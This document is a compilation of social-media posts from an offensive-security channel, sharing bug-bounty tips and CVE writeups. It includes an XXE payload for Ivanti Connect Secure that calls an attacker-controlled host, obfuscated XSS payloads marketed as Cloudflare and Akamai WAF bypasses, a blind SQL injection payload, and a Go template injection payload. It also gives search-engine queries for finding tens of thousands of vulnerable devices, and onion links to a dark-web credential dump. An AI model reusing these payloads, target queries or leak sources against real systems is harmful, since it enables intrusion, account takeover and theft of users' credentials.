🚨 CVE-2024-22024 - Ivanti Connect Secure XXE Exploit (SAMLRequest Injection)

🛠 This critical vulnerability allows XML External Entity (XXE) injection via a crafted SAMLRequest parameter — enabling attackers to read internal files, SSRF, or exfiltrate data.

🧠 Vulnerable Endpoint:

POST /dana-na/auth/saml-sso.cgi

📦 Injection Vector:
The vulnerability is triggered when the server processes a malicious SAMLRequest (XML-based SAML input) containing an external entity.

💥 Exploit Payload (Before Encoding):

<?xml version="1.0" ?>
<!DOCTYPE root [
  <!ENTITY % xxe SYSTEM "http://{{attacker-server}}/x">
  %xxe;
]>
<r></r>

🔐 Replace {{attacker-server}} with your Burp Collaborator or HTTP listener.

🧬 Base64-Encoded Payload:
Encode the full XML above using base64, then send it as a SAMLRequest parameter like:

POST /dana-na/auth/saml-sso.cgi
Content-Type: application/x-www-form-urlencoded
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjxET0NUWVBFIG5hbWU9InJvb3QiIFtdPCEtLSFFTlRJVFkgJSB4eGUgU1lTVEVNICJodHRwOi8ve3thdHRhY2tlci1zZXJ2ZXJ9fS94Ij4gJSB4eGU7XT48cj48L3I+

🔎 Tip: Always double-check the encoding and test with tools like Burp Suite or Postman.

📖 Reference:
🔗 CVE Info
📜 Ivanti Advisory
🔥 CVE-2024-22024 POC

🔥 Impact: File read, SSRF, possible credential theft.
💡 Mitigation: Update to the latest patched version. Disable XML entity resolution on the parser.

📢 For more critical CVEs, PoCs, and bug bounty tactics, join us at 👉 @cybersecplayground

💬 Like & Share to support the community.
#bugbountytips #cve #infosec #xxe #saml #ivanti #exploit #cybersecurity #bugbounty #cybersec

🚨 Advanced XSS WAF Bypass in JavaScript Context

💡 This clever payload uses template literals and method hijacking to bypass WAF filters that look for standard alert() calls or <script> tags.

💣 Payload:

''.replace.call`1${/.../}${alert}`
\

🧠 How It Works:
1️⃣ Uses template literals (...) with function interpolation, rarely detected by basic WAFs.

2️⃣ .replace.call is a method hijack that tricks the JavaScript engine into executing expressions.

3️⃣ The ${/.../} part is a placeholder—you can inject anything benign or control flow code here (e.g., regex).

4️⃣ ${alert} dynamically refers to the global alert function in modern browsers.

🧪 Example Use:
When injected in an environment where inline JS context is allowed:

<script>
  let x = ''.replace.call`1${/.*/}${alert}`
</script>

✅ This triggers an alert popup—without using parentheses or a direct alert() call, which many WAFs try to block.

📛 Why This Matters:

Standard filters often catch:

<script>alert(1)</script>

But not this obfuscated version:

''.replace.call`1${/.*/}${alert}`

📍 Used effectively in bug bounty and pentest scenarios involving tough WAFs.

🔐 Always test in safe environments (e.g., XSS Hunter, Burp Collaborator, or JSFiddle with CSP disabled).

📢 For more payloads, bypass techniques, and real-world CVEs →
Join 👉 @cybersecplayground

👍 Like & Share to help more researchers!

#bugbounty #xss #wafbypass #javascript #infosec #thelilnix #cybersecurity #payloads #cybersecplayground #websecurity

🔴 CRITICAL WordPress Vulnerability: CVE-2025-47539
💣 Unauthenticated Admin Account Creation via Eventin Plugin!

🔥 CVSS Score: 9.8 (Critical)
📌 Affected Plugin: Event Manager, Events Calendar, Tickets – Eventin
📦 Versions: <= 4.0.26
🌐 Impact: +10,000 WordPress sites are vulnerable!
🚫 Vulnerability: Missing authorization check in the import_items() function allows unauthenticated privilege escalation via the REST API.

🧠 What Can Attackers Do?
• Upload a malicious CSV file
• Trigger a backend import
• Create a new admin user
• Gain FULL CONTROL of the site 😱

🛠 ZoomEye Dork:

Eventin && app="WordPress"

🔍 Find vulnerable targets:
👉 ZoomEye Search
🧪 PoC: GitHub – Nxploited
🔎 Details: securityonline.info
📊 ZoomEye confirms: 548+ active vulnerable targets

🧪 Exploit Tool (Python)
• Auto-generates payload
• Uploads + triggers import
• Returns admin credentials

💡 Sample Output:

[+] Exploitation succeeded
[+] Username : NxPloted
[+] Password : nxploit123
[+] Role     : administrator

📈 Patch Now: Upgrade Eventin to v4.0.28 or later ASAP!

🔐 Stay Secure. Stay Updated.
For more critical CVE insights, PoCs, and exploit tips:

📢 Follow: @cybersecplayground
👍 Like & Share to support open security research!
#WordPress #CVE2025 #infosec #Eventin #vulnerability #exploit #ZoomEye #cybersecurity #bugbounty #pentesting

🔓 Privilege Escalation via Endpoint Inconsistency

📌 Bug Summary:
A strange behavior was detected in the API endpoint used to manage team groups:

PUT /v4/catalogos/grupos/1BBDB79F     => 401 Unauthorized
PUT catalogos/grupos/1BBDB79F         => 200 OK

🚨 Impact:

A low-privileged or unauthorized user is blocked from accessing /v4/..., but can perform privileged actions using the non-versioned endpoint.

🔍 Root Cause

The application likely applies access control based on route prefixes (/v4/) but forgets to enforce the same checks on fallback or legacy routes (catalogos/...).

This leads to:

✅ PUT catalogos/grupos/ID → Allowed (no auth or weak checks)
❌ PUT /v4/catalogos/grupos/ID → Rejected (correctly blocked)

⚔️ Exploitable Actions
With this bypass:

✏️ You can edit existing teams (PUT)
➕ You can create new teams if POST is similarly unprotected
🎯 Possibly delete or enumerate sensitive data via other HTTP verbs (test DELETE, GET, PATCH)

🧪 PoC Example (Burp / Curl)

PUT /catalogos/grupos/1BBDB79F HTTP/1.1
Host: target.com
Authorization: Bearer <low-priv-token>
Content-Type: application/json

{
  "name": "Red Team Access",
  "role": "admin"
}

➡️ Response: 200 OK

🔐 Remediation
👉🏻 Normalize access control checks across all routes, regardless of versioning.
👉🏻 Audit legacy or alias endpoints for missing middleware (e.g., auth, RBAC).

🟡 Consider blocking or redirecting legacy paths.

🚩 Severity: High
💎 Exploitable by unprivileged users
💎 Leads to unauthorized data tampering and privilege escalation
💎 May affect audit integrity and team configurations

📢 Stay sharp! Bypass bugs like this often lurk in the shadows of version upgrades and refactors. Always test alternate routes.

🔍 For more real-world bugs and advanced red team tips, follow @cybersecplayground

#PrivilegeEscalation #BugBounty #API #AuthorizationBypass #CyberSecurity #Exploit #WebSecurity

🚨 Broken Access Control 🔓 Exposes All Users
⚠️ Simple URL parameter = Full user enumeration!

🧠 What's the issue?
An API endpoint meant to return only your user info can be tricked into showing all users in the workspace using a hidden parameter. Classic Broken Access Control 💀

📡 Endpoints:

❌ Normal Request:

GET /_core_/workspaces/716/users

🔐 Returns only your data

✅ Exploit with:

GET /_core_/workspaces/716/users?return_all_user=true

🔓 Returns all users in the workspace

🔍 Why this matters:

Leaks full user directory 🧑‍💻👩‍💼

May expose:

📧 Emails
🆔 User IDs
🛡 Roles & permissions

Can lead to:

⚡️Privilege escalation
⚡️Phishing
⚡️Further lateral attacks

🛡 Fix Recommendations:

✅ Never trust client-side params for access control
✅ Enforce strict backend validation
✅ Implement Role-Based Access Control (RBAC)
✅ Audit all API endpoints & query params

💬 Found something similar? 🎯 Report it via Bug Bounty!

🧠 Stay sharp, hunters — these simple tricks still work in the wild! 🌍

📢 For more real-world vulns & bug bounty hacks:
🚀 Join our 🔐 CyberSec Playground 👉 @cybersecplayground

👍 Like & Share to educate the community!

#bugbounty #infosec #brokenaccesscontrol #api #pentesting #cybersecurity #webappsec #vuln #cybersecplayground #hacktheplanet #hackernews

🎯 Blind SQL Injection Hunting Tips (BSQLi)
Exploit time-based SQLi like a pro

Blind SQL Injection is tricky — there's no visible output, so you need to detect it by behavior (usually time delay).

Here's how to hunt it efficiently:

🛠 Step-by-Step Strategy:
1️⃣ Gather target URLs
Use tools like:

gau target.com > urls.txt
waybackurls target.com >> urls.txt

Or go manual with Google Dorks:

site:target.com inurl:php?id=

2️⃣ Test every parameter
Inject one param at a time:

example.com/page.php?id=PAYLOAD

3️⃣ Watch for delay-based response
No output? No problem — you’re looking for time delay.

💣 Example Payload:

0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z

✅ What it does:

If the DB returns true, it triggers a sleep(10)
You’ll see a 10-second delay
This confirms injection is successful — even with no output

🧠 Bonus Tips:
🚀 Run in Burp Intruder or ffuf with a delay monitor

Try different SQL syntaxes: OR SLEEP(5)--+, '||SLEEP(5)--

Useful on POST requests, JSON bodies, and even headers

🎯 Success = Detection
Once confirmed, escalate to extract:

🪝 DB names via information_schema
🪝 Users, hashes, tokens
🪝 Or trigger more dangerous logic

💥 Automate what you can, but always manually verify delays!

🔗 Follow: @cybersecplayground
❤️ Like | 🔁 Share | 🧠 Learn daily!

#BugBounty #SQLi #BlindSQLi #HackingTips #InfoSec #WebSecurity #Payloads #CyberSecurity #Recon #CTF #cybersecplayground

🔓 IDOR in Disguise – Bypass with .json Suffix
How a 403 turned into a 200 OK with a single trick

📍 Vulnerability: Insecure Direct Object Reference (IDOR)
You’re blocked by a 403? Try appending .json or .xml — and boom 💥

🧪 Discovery
While testing an endpoint:

PUT /my_day/jobs/4 HTTP/2 → ❌ 403 Forbidden

But then, using this slight variation:

PUT /my_day/jobs/4.json HTTP/2 → ✅ 200 OK

🔐 Authorization checks were bypassed.

💡 Why this works:
Many frameworks (Rails, Django, older Node APIs):

- Treat /resource.json as a different route
- Apply different middlewares or access checks
- Sometimes, JSON API routes are under-tested or forgotten

🚨 Impact:
✅ Edit or delete other users' jobs/tasks
✅ Privilege escalation
✅ Potential full account takeover if used on critical endpoints

🛠 Tips for Hunters:
Try .json, .xml, .html, .txt, .pdf, etc.

Fuzz URL paths with suffixes using:

ffuf -u https://target.com/jobs/4FUZZ -w extensions.txt

Always compare HTTP status codes & response body

Use Burp Repeater to replay both versions

🧠 IDORs are everywhere — especially in:

- To-do apps
- Calendars
- Project management tools
- RESTful APIs

📣 Keep Testing. Keep Winning.

🔗 Follow us for more: @cybersecplayground
❤️ Like | 🔁 Share | 🧠 Learn daily!

#IDOR #BugBounty #CyberSecurity #InfoSec #HackingTips #AuthorizationBypass #WebSecurity #Recon #CTF #cybersecplayground

🐞 Bug-Hunt Tips for New Hunters
🎯 Discover Unauthenticated Panels by Fingerprint

Looking to score easy wins in your bug bounty or recon workflow?

Use this simple whatweb trick to find exposed admin panels that don’t require authentication:

whatweb -i live.txt | grep -i "admin\|dashboard\|login"

📌 What this does:

- Scans a list of live hosts (live.txt)
- Filters out pages that mention:
- admin panels
- dashboard UIs
- login portals

🔎 Why it works:
Many platforms like:
- Jenkins
- Kibana
- Prometheus
- Webmin
- phpMyAdmin

...often get deployed and forgotten, especially in internal or staging environments.

➡️ No auth = jackpot for:

- Remote Code Execution (RCE)
- Credential leaks
- Internal service exposure
- Lateral movement

🚨 Real-world tip:
Once found, try:

- Default credentials (admin:admin, root:toor)
- Known CVEs (e.g., Jenkins RCE, unauth Kibana SSRF)
- Screenshotting with aquatone or gowitness for easy triage

🧠 Pro tip:
Chain this into your recon pipeline:

subfinder | httpx -status-code -silent > live.txt
whatweb -i live.txt | grep -i "admin\|dashboard\|login"

🎓 Knowledge = access. Stay sharp, automate wisely, and always test legacy panels.

Follow us for more recon gems and bug bounty tactics!

🔗 Join: @cybersecplayground
❤️ Like | 🔁 Share | 💣 Hunt wisely

#BugBounty #InfoSec #BugHunter #OSINT #Recon #CyberSecurity #WebSecurity #HackingTips #whatweb #AdminPanel #RCE

🧩 How to Collect GET-Based Parameters (Like a Pro)

🔍

A solid recon phase is the foundation of every successful bug bounty. Here’s my full methodology to collect GET parameters for deeper vulnerability testing like XSS, SSRF, Open Redirect, and more.

📌 Step-by-Step Breakdown

🔸 1. Subdomain + Endpoint Discovery
First, gather as many live subdomains and endpoints as possible:

subfinder -d vulnweb.com -all | tee subs.txt
cat subs.txt | httpx -paths /robots.txt,/sitemap.xml -silent -mc 200 | tee live_hosts.txt

🔸 2. URL Collection
Use multiple tools for maximum coverage:

cat subs.txt | waybackurls > wayback.txt
cat subs.txt | gau --threads 5 > gau.txt
cat subs.txt | hakrawler > hakrawler.txt

🧪 Merge everything:

cat wayback.txt gau.txt hakrawler.txt | sort -u > all_urls.txt

🔸 3. Extract GET Parameters
Now filter only the URLs that have query parameters:

grep -aE "\?.*=" all_urls.txt | grep -aiEv "\.(css|ico|png|jpg|js|json|svg|pdf|xml|webp)" | anew > get_params.txt

🔥 You can also clean and fuzz with qsreplace:

cat get_params.txt | qsreplace "FUZZ" > fuzzable_params.txt

🔸 4. BONUS: Extract Unique Param Names
For custom wordlists or targeted attacks:

cat get_params.txt | unfurl keys | sort -u > param_names.txt

🎯 Why This Matters:
Finding hidden or unused parameters gives you prime entry points to test for:
• ✅ Reflected & Stored XSS
• ✅ SSRF attacks via internal URL redirects
• ✅ Open Redirects and IDORs


💻 Want more real-world recon tips and hacking methods?
📢 Join us: 👉 @cybersecplayground

#BugBounty #CyberSecurity #InfoSec #GETparameters #XSS #SSRF #OpenRedirect #BugBountyTips #EthicalHacking #Recon #Pentesting #HackingTools #OSINT #HackerLife #CybersecPlayground

🕵️‍♂️ MasterBin – New Credential Dump Site on the Dark Web 🧬
A new .onion service has appeared, known as MasterBin, which reportedly hosts fresh user:password credential leaks — including combos from various forums, breaches, and potentially stealer logs.

🚨 Caution: As of now, the site seems to be intermittently down, but may return soon. Always use proper OpSec and a trusted Tor connection when browsing such resources.

🧩 Details:
🔗 MasterBin Onion URL
http://rfetmd5tcg2frv5tx6v3sdbuhkfhafad67d5gutzghmgzpmwpjeihlqd.onion

🧵 Related Dread Discussion
http://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/34da084e7a87287a2490

✅ Threads mention it may aggregate credentials from multiple sources into a search-friendly interface — similar to older services like Snusbase or Citadel leaks.

⚠️ Reminder:

1️⃣ Do not access such sites without a VPN + Tor
2️⃣ Never reuse credentials
3️⃣ Use this info ethically (e.g., for threat research, monitoring leaked data, or red team simulations)

🧠 Follow @cybersecplayground for dark web intel, breach alerts, and advanced cybersecurity tactics.

💬 Like & share to support the channel.

#DarkWeb #Leaks #CredentialDump #OpSec #CyberSecurity #BugBounty #CTI #cybersecplayground

🔍 WordPress Vulnerability Scanner: wpprobe 🚀

Looking for a clean, fast, and modular WordPress reconnaissance tool? wpprobe is a lightweight scanner for enumerating vulnerable plugins, themes, and WP versions.

🧰 Features:
✅ Enumerates:
🔸 WordPress versions
🔸 Vulnerable themes
🔸 Plugins (with known CVEs)

✅ Fast and Simple:
🔸 Scans hundreds of WordPress sites from a single input list
🔸 Uses fingerprints.json for version and vuln detection
🔸 Focuses on known CVEs and weak plugin/theme setups

✅ Customizable:
🔸 Easily extend with your own fingerprint DB
🔸 Can integrate into bug bounty recon pipelines

🛠 Installation:

git clone https://github.com/Chocapikk/wpprobe.git
cd wpprobe
go build .
./wpprobe -list targets.txt

➡️ targets.txt should contain URLs of suspected WordPress sites.

🔍 Output:
It shows:
🔸 Detected plugin versions
🔸 Associated CVEs (if any)
🔸 Misconfigurations and exposures

📁 Results are printed to stdout and can be redirected to files for mass analysis.

🧠 Tip:
Combine with tools like:
🔸 subfinder or amass for domain enumeration
🔸 httpx to find live WordPress installs
🔸 Then feed results into wpprobe to quickly identify low-hanging WordPress vulnerabilities.

📢 Join @cybersecplayground for daily bug bounty tools, recon tactics, and advanced hacking tips!
❤️ Like & Share if you love clean recon tools!

#BugBounty #WordPress #Recon #VulnerabilityScanner #InfoSec #wpprobe #GoLang #CyberSecurity #CTF #cybersecplayground

🧠 Bug Bounty Dorks to Discover Reward Programs

Want to uncover hidden responsible disclosure or bug bounty programs?

Use these Google Dorks to find gold:

• site:*.*.nl intext:"responsible disclosure reward"
•"security vulnerability" "report"
• inurl:"security report"
• site:.eu "responsible disclosure"
• "responsible disclosure" university
• inurl:/responsible-disclosure/ university

💡 Pro Tip: These dorks help locate universities, EU orgs, and private entities offering rewards or recognition for vulnerabilities — often overlooked by most hunters.

Happy hunting! 🎯

📲 Follow @cybersecplayground for more recon tips, dorks, and daily bug bounty hacks.
🔁 Like & Share with your hunting crew!

#bugbountytip #infosec #recon #dorks #bugbounty #securityresearch

🔍 [IDOR Leads to Sensitive Info Exposure]

Two unauthenticated GET requests leaking other users' private data:

GET /v2/user/profile?clubname=123
GET /v1.0/user/profile?clubname=321

💥 Leaked Data Includes:

🔸 Club Owner’s Email Address 📧
🔸 Phone Number 📱
🔸 Current Balance 💰

🧠 What’s happening?
This is a classic Insecure Direct Object Reference (IDOR) — the backend doesn’t verify if the requesting user is authorized to view the specified clubname.

✅ Fix Recommendation:
Always verify object ownership before responding with sensitive data. Implement proper access control on API endpoints.

📲 For more real-world bugs and exploitation insights, follow @cybersecplayground

🔁 Like & Share if you’ve seen similar bugs!

#bugbounty #infosec #IDOR #cybersecurity #api #vulnerability #recon

🔍 Triple Fuzzing Technique for Hidden Paths

Let’s say you discover this URL during recon:
👉 https://test[.]com:8443/phpmyadmin

Don't stop there — Triple Fuzz it! 🧠

🔥 Try Fuzzing These Paths:
1️⃣ https://test[.]com/FUZZ
2️⃣ https://test[.]com:8443/FUZZ
3️⃣ https://test[.]com:8443/phpmyadmin/FUZZ

Why? Because:

✅ Different ports = different services
✅ Nested directories often hide backups or admin panels
✅ Misconfigured virtual paths may expose sensitive endpoints

————

📌 Use tools like:

- ffuf
- dirsearch
- feroxbuster

🔁 Combine this with smart wordlists for 🔐 high-value paths.

————

💡 Small tweaks = BIG wins in bug bounty.
📲 Follow @cybersecplayground for more daily hacking tips!
💬 Got more recon tricks? Share them below!

#bugbounty #fuzzing #recon #websecurity #ctf #infosec

🚨 CVE-2024-24919: Check Point Remote Access VPN Vulnerability

A critical flaw has been identified in Check Point's Remote Access VPN — potentially allowing attackers to steal credentials or bypass security mechanisms.

—————

🔍 Quick Summary:
💥 Vulnerability: Unauthenticated Info Disclosure
🧠 CVSS Score: 8.6 (High)
📅 Year: 2024
📌 Affects: SSL Network Extender (VPN)
📂 Advisory: NVD Details

—————

🛠 Recon Dorks to Find Targets:

👉 FOFA Query 1:

app="Check_Point-SSL-Network-Extender"

👉 FOFA Query 2:

title="Check Point SSL Network Extender"

🌍 Results: 45,343 exposed instances
🔎 FOFA Direct Link: Search Now

—————

🧪 PoC & Technical Breakdown:
📚 Blog: WatchTowr Labs
💻 Includes a working proof of concept for exploitation.

—————

🛡 Mitigation Tip:
✔️ Apply latest patches from Check Point ASAP
✔️ Monitor VPN access logs for anomalies

—————

📲 Stay ahead in the bug bounty game!
Join @cybersecplayground for daily CVE alerts, recon tricks, and PoCs.

🔁 Like, Share & Educate
#bugbounty #CVE2024_24919 #checkpoint #vpn #infosec #cybersecurity #zeroday #cybersecplayground

🔍 Tool Spotlight: WhatWeb – Website Fingerprinting Like a Pro

Want to know what’s running behind a website without touching the source code?
Meet WhatWeb — your go-to recon tool for fingerprinting technologies used on websites 🔧🌐

Read full Post At Github (Dont forget to give star and follow us on github) :

🔗 Link : https://github.com/cybersecplayground...

#bugbounty #CVE2024_24919 #checkpoint #vpn #infosec #cybersecurity #zeroday #cybersecplayground

💥 SSTI in Go Templates = Stored XSS?

If you come across SSTI (Server-Side Template Injection) in a Go (Golang) application, don’t stop at just proving injection — go for impact!

Try this payload to bypass HTML sanitization and achieve XSS :

{{define "T1"}}<script>alert(1)</script>{{end}} {{template "T1"}}

🔍 This works because:
💎 Go templates treat {{define}} and {{template}} as dynamic blocks.
⚡️ You can inject arbitrary template logic including script tags.
🔸 Useful in misconfigured custom template rendering engines.

💡 Why it matters:
Stored XSS via SSTI can lead to session hijacking, data exfiltration, or even account takeover.

📢 Stay ahead in bug bounty & infosec — follow @cybersecplayground for daily tips, tools, and CVE insights.

💬 Found a new payload? Drop it in the comments!
👍 Like & 🔁 Share if this helped!

#bugbountytips #ssti #xss #golang #infosec #cybersec #cybersecplayground

🚨 CVE-2025-32756: Fortinet RCE via Stack-Based Buffer Overflow

A critical unauthenticated remote code execution vulnerability was discovered in multiple Fortinet products — caused by a stack-based buffer overflow in the AuthHash cookie parsing logic. Exploiting this allows full remote code execution without authentication.

🔍 Key Details:
📌 Type: Stack-based Buffer Overflow
💥 Impact: Unauthenticated RCE
🧠 Attack Vector: Malicious AuthHash cookie
📆 Year: 2025
🛠 Status: Public PoC available

🧪 Affected Products:
• FortiVoice
• FortiMail
• FortiNDR
• FortiRecorder
• FortiCamera

🧬 PoC GitHub Repo:
🔗 CVE-2025-32756-POC by kn0x0x

🛡 Mitigation Steps:
✅ Apply patches released by Fortinet ASAP
✅ Disable unnecessary web interfaces
✅ Monitor for abnormal traffic targeting Fortinet login panels

📲 For more CVEs, PoCs, and recon tips — follow @cybersecplayground
Get smarter every day in cybersecurity.

🔁 Like & Share to spread awareness
#bugbounty #fortinet #rce #CVE2025_32756 #cybersecurity #infosec #zeroday #cybersecplayground

🚨 New WAF Bypass for Akamai & Cloudflare
🛡 XSS Payload via onscrollsnapchange + Obfuscation

Researchers found a new way to bypass some WAF rules using the obscure event onscrollsnapchange in combination with obfuscated eval logic.

💥 Payload:

<address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])]
(window['a'+'to'+(['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ==')); 
style=overflow-y:hidden;scroll-snap-type:x>
<div style=scroll-snap-align:center>1337</div></address>

🔍 How it works:
🔸onscrollsnapchange is rarely filtered and gets overlooked by many WAFs.
🔸 eval is split and reconstructed dynamically: ['l','b','c'][0] = 'l'.
🔸 Base64 payload decoded to: alert(origin).
🔸 Built-in scroll and display tricks help it render without suspicion.

✅ Bypasses tested on:
• Cloudflare (standard settings)
• Akamai WAF profiles

💡 Tip: Always explore lesser-known event attributes + JS obfuscation when testing for XSS/WAF bypasses.

🔔 Follow @cybersecplayground for more cutting-edge bypasses, CVE drops, and recon techniques.

🔗 Other XSS payload list at cybersecplayground github
#xss #wafbypass #akamai #cloudflare #bugbountytips #cybersec #infosec #cybersecplayground

💡 Bug Bounty Pro Tip: Uncover Hidden Subdomains via /cdn-cgi/trace 🔍

Want to find internal IPs or misconfigured edge services on live domains?

Try this:
➡️ Visit:

https://target.com/cdn-cgi/trace

✅ It often reveals:
🔸 Internal IP (ip=)
🔸 Datacenter info
🔸 Trace metadata

🔁 From IP to Hidden Subdomains:

🎯 Get ASN range of the internal IP (using asnmap or amass intel)

🚀 Scan with naabu to find active hosts

🔎 Enumerate reverse DNS via dnsx to spot hidden subdomains!

💥 Sometimes you’ll catch staging, dev, or admin panels that don’t even show up in public recon.

🔐 Your move:
What’s YOUR secret trick for hidden subdomain hunting?
👇 Drop it below and share the love 👇

📡 Follow @cybersecplayground for daily recon tactics, advanced bug bounty tricks, and offensive security content.

#bugbounty #recon #infosec #subdomain #OSINT #CTF #cybersecplayground

🚨 ALERT: CVE-2024-3721
Under Active Exploitation

A new variant of the Mirai malware botnet is exploiting a command injection vulnerability in TBK DVR-4104 and DVR-4216 digital video recording devices to hijack them.

The flaw, tracked under CVE-2024-3721, is a command injection vulnerability disclosed by security researcher "netsecfish" in April 2024. 🧠📟

🎯 Vulnerability: CVE-2024-3721
💥 Impact: Remote Code Execution → Botnet Infection
🔎 Targeted Devices: TBK DVR systems
📊 Over 97,000+ exposed services are indexed on Hunter

🧪 Recon Queries:

🔍 Hunter:

protocol.banner="Location:/login.rsp"

🔍 FOFA:

banner="Location:/login.rsp"

📚 In-Depth Analysis:
Kaspersky SecureList
BleepingComputer Report
SecurityOnline News

🧵 Hunter Direct Search:
🔗 Search Results (97K+)

💻 Stay ahead in vuln intelligence & recon: Join @cybersecplayground
🔁 Like & Share to spread awareness!

#CVE2024_3721 #Mirai #botnet #hunterhow #fofa #vulnerability #infosec #osint #cybersecplayground